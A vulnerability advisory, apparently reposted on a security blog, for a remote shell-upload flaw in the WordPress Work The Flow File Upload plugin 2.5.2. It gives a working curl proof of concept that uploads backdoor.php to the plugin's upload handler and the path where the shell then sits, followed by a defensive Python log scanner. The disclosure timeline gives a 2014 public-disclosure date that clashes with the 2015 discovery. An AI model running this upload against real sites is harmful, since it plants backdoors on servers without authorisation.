WordPress Work-The-Flow 2.5.2 Shell Upload

Description:
WordPress Work The Flow plugin version 2.5.2 suffers from a remote shell upload vulnerability.

######################

# Exploit Title : WordPress Work the flow file upload 2.5.2 Shell Upload Vulnerability

# Exploit Author : Claudio Viviani

# Software Link : https://downloads.wordpress.org/plugin/work-the-flow-file-upload.2.5.2.zip

# Date : 2015-03-14

# Tested on : Linux BackBox 4.0 / curl 7.35.0

######################

# Description:

Work the Flow File Upload. Embed Html5 User File Uploads and Workflows into pages and posts.
Multiple file Drag and Drop upload, Image Gallery display, Reordering and Archiving.
This two in one plugin provides shortcodes to embed front end user file upload capability and / or step by step workflow.

######################

# Location :

http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php


######################

# PoC:

curl -k -X POST -F "action=upload" -F "files=@./backdoor.php" http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php

# Backdoor Location:

http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/backdoor.php
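
For defenders reviewing a site that ran version 2.5.2, the following added example (not part of the original advisory) scans web server access logs for the two request patterns the PoC produces: a POST to the upload handler and a request for a script under files/. The combined log format, the extension list, the finding labels and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Path prefix taken from the advisory's "Location" and "Backdoor Location" entries.
PLUGIN_BASE = ("/wp-content/plugins/work-the-flow-file-upload/public/assets/"
               "jQuery-File-Upload-9.5.0/server/php/")
# Extensions a PHP handler may execute (assumed list; match it to your server config).
EXEC_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
# Assumed log format, Apache/nginx "combined": ip - user [time] "METHOD target proto" status ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+)[^"]*" (\d{3}) ')

def scan(lines):
    """Return (client_ip, finding, path) for requests that match the advisory's pattern."""
    findings = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ip, method, target, status = m.groups()
        # Drop the query string and decode %xx so "a%2Ephp" is seen as "a.php".
        path = unquote(target.split("?", 1)[0])
        if not path.startswith(PLUGIN_BASE):
            continue
        rest = path[len(PLUGIN_BASE):]
        if method == "POST" and rest in ("", "index.php") and status.startswith("2"):
            findings.append((ip, "upload-handler-post", path))
        elif rest.startswith("files/") and EXEC_EXT.search(rest):
            # 200 means the server answered for the script; anything else is a probe.
            kind = "script-served" if status == "200" else "script-probe"
            findings.append((ip, kind, path))
    return findings

def make_line(ip, method, path, status):
    """Build one constructed combined-format log line for the sample below."""
    return f'{ip} - - [04/Apr/2015:10:00:00 +0000] "{method} {path} HTTP/1.1" {status} 0 "-" "-"'

# Constructed sample (documentation IP ranges, not from a real incident).
SAMPLE = [
    make_line("203.0.113.7", "POST", PLUGIN_BASE + "index.php", 200),
    make_line("203.0.113.7", "GET", PLUGIN_BASE + "files/backdoor.php?x=1", 200),
    make_line("198.51.100.9", "GET", PLUGIN_BASE + "files/photo.jpg", 200),
    make_line("198.51.100.9", "GET", PLUGIN_BASE + "files/test.PHP5", 404),
    make_line("198.51.100.9", "GET", "/index.php", 200),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(*finding)
```

A hit of either kind on a host that ran 2.5.2 is a reason to inspect the contents of the files/ directory and to confirm the plugin has been updated to the fixed release named in the timeline.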


######################

# Vulnerability Disclosure Timeline:

2015-03-14:  Discovered vulnerability
2015-04-03:  Vendor Notification
2015-04-03:  Vendor Response/Feedback
2015-04-04:  Vendor Fix/Patch (2.5.3)
2014-04-04:  Public Disclosure

[2015-04-07]

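Permalink: https://www.unhonker.com/bug/1715.html | 90' s Blog | Focus on Network Information Security

This entry was posted by unhonker on 2015-04-07 in the Vulnerability Announcements category. You may comment on it, and you may quote it on your own site or blog as long as you keep the original URL and author.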